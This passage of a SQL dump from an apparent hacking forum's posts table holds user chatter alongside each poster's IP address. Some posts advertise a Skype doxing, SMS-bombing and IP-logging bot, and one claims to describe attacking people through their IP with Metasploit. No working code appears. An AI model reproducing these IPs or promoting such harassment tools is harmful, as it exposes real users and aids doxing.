'0', '1', 'd1183371fe2d82da9c7eab7c516f6863', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7421', '1249', '7412', '35', 'RE: New Avatar', '0', '62', 'R?????zo?', '1352587611', 'I don\'t know who\'s even that character but it looks cool :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '6c6a9622bbfc5dcdbb9339d11540e3d6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7422', '1213', '7173', '34', 'RE: Black Sleek Thread Design .PSD', '0', '62', 'R?????zo?', '1352587713', 'Look great, keep up the good work.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'ae39cc079922a123eacad1ab0d614c36', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7423', '1237', '7318', '61', 'RE: Suggestion for this section', '0', '62', 'R?????zo?', '1352588324', 'Good Idea, I will post some more content here now. I\'ve been kinda inactive lately but I will be back :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '354f8433c8255109bf3fafe161174952', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7424', '792', '4137', '61', 'RE: Unique - Rules [PLEASE READ]', '0', '62', 'R?????zo?', '1352588356', 'Wierd you are mod, you should be able to? Or is just the leader thingy?', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '55c0d18e8b809fc01acb00a8fb11186c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7425', '315', '1476', '61', 'RE: Welcome to Unique\'s HQ', '0', '62', 'R?????zo?', '1352588387', 'I\'m gonna post some now I think :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '6e6f24515c55df42d58ed52fdf94dddb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7426', '1250', '0', '61', 'Skype Responce { Skype Resolver, Email/Phone Doxer, Email/SMS Bomber, IP Logger}', '0', '62', 'R?????zo?', '1352588484', '[align=center] [lock] [url=skype:SkypeResponce?chat][img]http://mystatus.skype.com/smallclassic/SkypeResponce[/img][/url] [/lock] Add and send pm \" .invite() \"[/align] Here some screenshots [img]http://i.minus.com/iYWKlgfcePl1W.png[/img] In Action [img]http://i.minus.com/iFBWFrnhkQp0U.png[/img] [img]http://i.minus.com/ixEqbD5WiO0fL.png[/img] How to use [lock] Open Skype>Add Contacts>Username>SkypeResponce Type .invite() then .info() and choice a command [lock] credits: HardCoreSmasher', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '291091fcca4703038868d93593903862', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7427', '1250', '7426', '61', 'RE: Skype Responce { Skype Resolver, Email/Phone Doxer, Email/SMS Bomber, IP Logger}', '0', '82', 'iTzIpod', '1352589058', 'Lock doesn\'t seem to work here??', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'db950a1588da6fee41d38971e79bbfd8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7428', '1249', '7412', '35', 'RE: New Avatar', '0', '82', 'iTzIpod', '1352589100', 'I know this was exactly what I said when I got it Reloadzor. :p And I liked it because of that hair! :o', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '64c16afb0ac203b5823494612d00ee8f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7429', '1237', '7318', '61', 'RE: Suggestion for this section', '0', '82', 'iTzIpod', '1352589145', 'I don\'t think the lock MyCode doesn\'t work in here? Not sure.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1501c464ceeeebdee7bf440ba5af17bc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7430', '792', '4137', '61', 'RE: Unique - Rules [PLEASE READ]', '0', '82', 'iTzIpod', '1352589176', 'I think it\'s just the leader thing I\'m not quite sure. I should be able too though..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '20e5b29810981f6766b9615f3f64b42d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7432', '1237', '7318', '61', 'RE: Suggestion for this section', '0', '1', 't3h jok3r', '1352589787', 'It works in this section. It works in all the forums on LH.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '915915cd669b136aa492fb47b95e2506', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7433', '418', '1925', '16', 'RE: [eBook][Special] iTzIpod\'s SEing Tutorial', '0', '342', 'Squirt1971', '1352593640', 'Thanks :D I just downloaded it', '96.21.227.16', '1612047120', '0', '0', '0', '0', '1', '86392e5eb8fa57eb976c8452c77d2c76', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7434', '1249', '7412', '35', 'RE: New Avatar', '0', '257', 'XxTREYZxX', '1352593800', 'It looks cool as where did you find it.', '101.162.139.13', '1705151245', '1', '0', '0', '0', '1', 'd8d18382cbe56231bae21facef9659a9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7435', '418', '1925', '16', 'RE: [eBook][Special] iTzIpod\'s SEing Tutorial', '0', '257', 'XxTREYZxX', '1352593901', 'just read this thanks heaps its mainly for begginers.', '101.162.139.13', '1705151245', '1', '0', '0', '0', '1', '1978b4cf71ae67737a8651d5f8cb668e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7436', '1213', '7173', '34', 'RE: Black Sleek Thread Design .PSD', '0', '257', 'XxTREYZxX', '1352594009', 'Thanks heaps posting so i can get it.', '101.162.139.13', '1705151245', '1', '0', '0', '0', '1', 'eb39e338a8413d40f6c389711164e4bb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7437', '1241', '7325', '35', 'RE: New Userbars- Voting', '0', '257', 'XxTREYZxX', '1352594088', 'I really like the first one its cool and fancy.', '101.162.139.13', '1705151245', '1', '0', '0', '0', '1', 'b5ab22fbb9ecc0426a156d8febc1d247', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7438', '1248', '7407', '3', 'RE: Recent Updates', '0', '257', 'XxTREYZxX', '1352594228', 'Great work every one on the forums. What\'s the market place.', '101.162.139.13', '1705151245', '1', '0', '0', '0', '1', '59d59d2de47a956d08f4ea1118585e17', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7439', '1247', '7398', '4', 'RE: Hey Everybody!', '0', '257', 'XxTREYZxX', '1352594381', 'Welcome to the forums bud, how did you find us.', '101.162.139.13', '1705151245', '1', '0', '0', '0', '1', 'c3dff1eee9715014346d6852805be6fd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7440', '238', '1021', '56', 'RE: Ban the user above you', '0', '257', 'XxTREYZxX', '1352594521', 'Banned for having 29 rep.', '101.162.139.13', '1705151245', '1', '0', '0', '0', '1', '96db7c76188bd9500d31741151a0713c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7441', '197', '696', '56', 'RE: /me Thread', '0', '257', 'XxTREYZxX', '1352594655', '/me is having internet and cloudfare issues', '101.162.139.13', '1705151245', '1', '0', '0', '0', '1', '87c55d8f1786f840d75e54cb4047f487', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7442', '487', '2354', '56', 'RE: Corrupt a wish', '0', '257', 'XxTREYZxX', '1352595098', 'Granted but then we wouldn\'t have school to learn I wish i was joker', '101.162.139.13', '1705151245', '1', '0', '257', '1352595145', '1', 'baa10b8eb35d7bf68ab965caa3c14740', '0', '1352595145'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7443', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '257', 'XxTREYZxX', '1352595806', 'what do i win. wait i won whooo.', '101.162.139.13', '1705151245', '1', '0', '0', '0', '1', '09425f1356dc12f31769a1d982c74934', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7444', '253', '1106', '56', 'RE: Count to 200', '0', '257', 'XxTREYZxX', '1352595874', '63,64,65,150 whoa we are on 150', '101.162.139.13', '1705151245', '1', '0', '0', '0', '1', '38a4179d7af3167d14fa9c8cba8e6e66', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7445', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '257', 'XxTREYZxX', '1352596033', 'I dont know what post i am on.i am posting now to see what post i have. congratz LH', '101.162.139.13', '1705151245', '1', '0', '0', '0', '1', 'ea6ad09532ab829efb9eefd4763afc05', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7446', '1237', '7318', '61', 'RE: Suggestion for this section', '0', '82', 'iTzIpod', '1352597444', 'Oh I saw a thread of Reloadzor\'s that I didn\'t post in and the lock Mycode wasn\'t activated. Oh wait, nevermind it\'s because I\'m a moderator of this section I think. Other than that, @t3h jok3r, how come I can\'t access the Group memberships thing to view Unique\'s Members?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e679195f001f1df2fd38489dbb4151f7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7447', '1249', '7412', '35', 'RE: New Avatar', '0', '82', 'iTzIpod', '1352597485', 'My friend gave it to me. :p I picked it because it looks cool.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f05acade4204d439ecc0df43d3c87d23', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7448', '418', '1925', '16', 'RE: [eBook][Special] iTzIpod\'s SEing Tutorial', '0', '82', 'iTzIpod', '1352597515', 'Yes. Thanks for that bump. :3 Enjoy!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b19605553e8ac8d046d40c22bffd88ed', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7449', '1248', '7407', '3', 'RE: Recent Updates', '0', '82', 'iTzIpod', '1352597573', 'The Marketplace Section is basically the \'Buy and Sell\' Section. Like a Marketplace. Kinda pretty self explanatory.. ._.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '46ad766d71d38adeac47d674959a89d5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7450', '1170', '6839', '63', 'RE: Need a sig', '0', '4', 'Triple H', '1352597601', 'No I wasnt rushing you. Thanks and for first one can you make background like lh background?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'ddd9848bdea78ffefee40fd1e0c97613', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7451', '238', '1021', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1352597603', 'Banned for having 431 posts.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1bcf3f43714b68e57f7bc6a2569a93a2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7452', '1171', '6840', '33', 'RE: Anyone have photoshop cracked?', '0', '4', 'Triple H', '1352597632', 'Thanks for the help and download.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '1228482b605584f56aae51ecb78a9136', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7453', '197', '696', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1352597634', '/me tells XxTREYZxX that all members are experiencing it.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '6ddc84fa7218a801949af1b92ebc44ab', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7454', '1248', '7407', '3', 'RE: Recent Updates', '0', '4', 'Triple H', '1352597674', 'Lol iTzIpod and nice updates. Thanks for informing us.', '72.231.24.165', '1223104677', '1', '0', '4', '1352597695', '1', '268763f4c44ea6acf28424cf8aa55cb9', '0', '1352597695'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7455', '487', '2354', '56', 'RE: Corrupt a wish', '0', '82', 'iTzIpod', '1352597674', 'Granted but then you died. I wish I was smart.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'faf1f614060ad27b8a84befd866c072c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7456', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '82', 'iTzIpod', '1352597705', 'Looks like I\'ve won again. I love my sexy avatar. <3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ad17ac427142c86d70ebdfec0edfcd4c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7458', '1144', '7402', '11', 'RE: What can you do with?', '0', '4', 'Triple H', '1352597811', '[quote=\'sirchamp\' pid=\'7402\' dateline=\'1352575400\'] [quote=\'Triple H\' pid=\'6958\' dateline=\'1351918876\'] You can DOX them, boot them offline, send them viruses or steal all their keystrokes. [/quote] You cant send them virues or steal their keystrokes if you have their ip adress lol. [/quote] I think you could do it with Metasploit or cain & abel.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '1d11a05fc9a598163ae1fcade206552d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7459', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '82', 'iTzIpod', '1352597825', 'I reached 1500 posts. :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b30c85519cb88f18b82fcb76ec69e00a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7467', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '1', 't3h jok3r', '1352604150', 'Congratz and you made 1k posts under around a month because your awesome.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '772e177ebe79bb89c5102648c6384593', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7461', '1170', '6839', '63', 'RE: Need a sig', '0', '82', 'iTzIpod', '1352598065', 'What do you mean? Like make it match the forum\'s colors?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2d92156fe8729c302e40be08a4cd0a84', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7462', '1251', '0', '3', '[Bug] Award Icons', '0', '82', 'iTzIpod', '1352598124', 'Some of the Award Icons are broken again...', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c1094dfd620a38403e4d67916d5db7cf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7463', '1252', '0', '49', '[Suggestion] Post cooldown', '0', '82', 'iTzIpod', '1352598223', 'Elite members = 10-15 Seconds Cooldown (Current is 30) Normal members = 20-25 Seconds Cooldown (Current is 30) I think this would be a nice addition to the forum by lowering the post cooldowns just by a little bit.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9778bab3142abbe63455967d22632d15', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7464', '1171', '6840', '33', 'RE: Anyone have photoshop cracked?', '0', '82', 'iTzIpod', '1352598257', 'No problem. Any way of thanks is appreciated. Enjoy your day.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a803cdb9ae778b958c4012d5c4992ca9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7468', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '82', 'iTzIpod', '1352604446', 'I know I am. Thanks t3h jok3r.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b0eba3cc3c572dcd85139e18a4c1b49c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7469', '1247', '7439', '4', 'RE: Hey Everybody!', '0', '342', 'Squirt1971', '1352606030', '[quote=\'XxTREYZxX\' pid=\'7439\' dateline=\'1352594381\'] Welcome to the forums bud, how did you find us. [/quote] Thanks, I saw a link on another forums and it looked pretty good so I registered.', '96.21.227.16', '1612047120', '0', '0', '0', '0', '1', '6685b1c744d19797e237820689b9c00b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7470', '1252', '7463', '49', 'RE: [Suggestion] Post cooldown', '0', '257', 'XxTREYZxX', '1352617817', 'I think this would be a great addition to the site.', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '8621c1e08d664c003093910739e5ecd7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7471', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '257', 'XxTREYZxX', '1352618447', 'why do i keep wining, i won.', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '3d2427bfc19823a81af9e206495fa132', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7472', '238', '1021', '56', 'RE: Ban the user above you', '0', '257', 'XxTREYZxX', '1352618907', 'Banned because your a spammer aah lol', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', 'dff79e5268dcc8e0a22050574faa7017', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7473', '1235', '7313', '42', 'RE: Marijuana legalized in two US states', '0', '262', 'RAND0M1ZER', '1352619728', 'Wow I\'m really surprised this happened. Does this mean its also now legal to grow? and will there be shops where you can buy it?', '108.162.138.186', '1822591674', '0', '0', '0', '0', '1', '4c0d190463c8deaf4d4ec00863e8bfba', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7474', '1234', '7299', '46', 'RE: Did someone ever hack you through phishing?', '0', '262', 'RAND0M1ZER', '1352619796', 'I lost my steam account through phishing like 6-7 years ago.', '108.162.138.186', '1822591674', '0', '0', '0', '0', '1', '9f74802ac2c505d1757042be69d838bf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7475', '1236', '7317', '3', 'RE: CloudFlare Issues?', '0', '262', 'RAND0M1ZER', '1352619849', 'Yeah whenever I post I get a CloudFlare page, hopefully this is resolved promptly.', '108.162.138.186', '1822591674', '0', '0', '0', '0', '1', '7b76739e05305592de10cbb0566f80cd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7476', '1248', '7407', '3', 'RE: Recent Updates', '0', '62', 'R?????zo?', '1352620787', 'Where\'s the market place? Can\'t find it.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'bd6445b77f60252409d9e500f8bfbf86', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7477', '1248', '7407', '3', 'RE: Recent Updates', '0', '53', 'sirchamp', '1352624893', 'Finally a marketplace section :):)', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '250a748a164ae443350587c0c17bb9b2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, 